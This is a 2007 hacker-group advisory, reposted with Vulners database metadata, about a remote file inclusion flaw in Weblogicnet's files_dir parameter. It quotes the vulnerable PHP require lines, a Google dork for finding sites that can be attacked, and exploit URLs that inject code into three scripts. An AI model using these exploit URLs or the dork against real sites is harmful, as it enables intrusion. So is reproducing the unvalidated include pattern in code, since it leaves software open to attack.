Description
#############################Nyubicrew Community################################
#
# Weblogicnet (files_dir) Remote File Inclusion
#
# vendor : http://www.weblogicnet.com/
# source : http://weblogicnet.com/data/weblogicnet.tgz
#
#################################################################################
#
#
# Bug Found By :home_edition2001 a.k.a (bius) (31-08-2007)
#
# contact: bius22@mac.com
#
# Website : www.solpotcrew.org/adv/home_edition2001-adv-02.txt
#
################################################################################
#
#
# Greetz: Nyubi aka solpot , Matdhule , S4M3K ,[DEVIL_MAY_CRY] , iFX , Scr3W_W0rM ,
# nakkuta , bukan-diriku , POET , Th0nk , mbako_semprul , Fungky , airsoul
# wong_edan , ^s0n_g0ku^ , aLiiF , sparta-x , dudut , xtremeshell , Bithedz
# th3sn0wbr4in , ReAksi , X8 , junkiest , K1tk4t , masboi , saritem
# x-ace , replacement_killer , LamerCrew , k1n9k0ng ,[K]ompoR_Meledu[K]
# and all member #nyubicrew @ irc.mildnet.org
# especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "files_dir" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from :
es_desp.php
es_custom_menu.php
es_offer.php
################################################################################
# Weblogicnet #
# http://www.weblogicnet.com/ info@weblogicnet.com #
################################################################################
# Use of this program constitutes your agreement to the terms contained in the #
# LICENSE file within this distribution. #
################################################################################
<ahref="
<?php require($files_dir.'/_custom_menu_link.php'); ?>">
<?php require($files_dir.'/_custom_menu_name.php'); ?></a><br>
google dork : inurl:es_offer.php?files_dir=
exploit : http://somehost/path_to_Weblogicnet/es_desp.php?files_dir=[evilCode]
http://somehost/path_to_Weblogicnet/es_custom_menu.php?files_dir=[evilCode]
http://somehost/path_to_Weblogicnet/es_offer.php?files_dir=[evilCode]
######################MY Special Girl JUST FOR U Ula#########################
######################################E.O.F##################################
{"id": "SECURITYVULNS:DOC:17961", "bulletinFamily": "software", "title": "SolpotCrew Advisory #15 (home_edition2001) - Weblogicnet (files_dir) Remote File Inclusion", "description": "#############################Nyubicrew Community################################\r\n#\r\n# Weblogicnet (files_dir) Remote File Inclusion\r\n#\r\n# vendor : http://www.weblogicnet.com/\r\n# source : http://weblogicnet.com/data/weblogicnet.tgz \r\n#\r\n#################################################################################\r\n#\r\n#\r\n# Bug Found By :home_edition2001 a.k.a (bius) (31-08-2007)\r\n#\r\n# contact: bius22@mac.com\r\n#\r\n# Website : www.solpotcrew.org/adv/home_edition2001-adv-02.txt\r\n#\r\n################################################################################\r\n#\r\n#\r\n# Greetz: Nyubi aka solpot , Matdhule , S4M3K ,[DEVIL_MAY_CRY] , iFX , Scr3W_W0rM , \r\n# nakkuta , bukan-diriku , POET , Th0nk , mbako_semprul , Fungky , airsoul\r\n# wong_edan , ^s0n_g0ku^ , aLiiF , sparta-x , dudut , xtremeshell , Bithedz\r\n# th3sn0wbr4in , ReAksi , X8 , junkiest , K1tk4t , masboi , saritem\r\n# x-ace , replacement_killer , LamerCrew , k1n9k0ng ,[K]ompoR_Meledu[K]\r\n# and all member #nyubicrew @ irc.mildnet.org\r\n# especially thx to str0ke @ milw0rm.com\r\n#\r\n###############################################################################\r\nInput passed to the "files_dir" is not properly verified\r\nbefore being used to include files. This can be exploited to execute\r\narbitrary PHP code by including files from local or external resources.\r\n\r\ncode from :\r\nes_desp.php\r\nes_custom_menu.php\r\nes_offer.php\r\n\r\n################################################################################\r\n# Weblogicnet #\r\n# http://www.weblogicnet.com/ info@weblogicnet.com #\r\n################################################################################\r\n# Use of this program constitutes your agreement to the terms contained in the #\r\n# LICENSE file within this distribution. #\r\n################################################################################\r\n\r\n<ahref="\r\n<?php require($files_dir.'/_custom_menu_link.php'); ?>">\r\n<?php require($files_dir.'/_custom_menu_name.php'); ?></a><br>\r\n\r\ngoogle dork : inurl:es_offer.php?files_dir=\r\n\r\nexploit : http://somehost/path_to_Weblogicnet/es_desp.php?files_dir=[evilCode]\r\n http://somehost/path_to_Weblogicnet/es_custom_menu.php?files_dir=[evilCode]\r\n http://somehost/path_to_Weblogicnet/es_offer.php?files_dir=[evilCode]\r\n\r\n######################MY Special Girl JUST FOR U Ula#########################\r\n######################################E.O.F##################################", "published": "2007-09-11T00:00:00", "modified": "2007-09-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17961", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:23", "edition": 1, "viewCount": 19, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8131"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8131"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": 0.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645488315, "score": 1659803227, "affected_software_major_version": 1666695388}, "_internal": {"score_hash": "31d3b57c2dd08d4fda60f809deff8754"}}
{}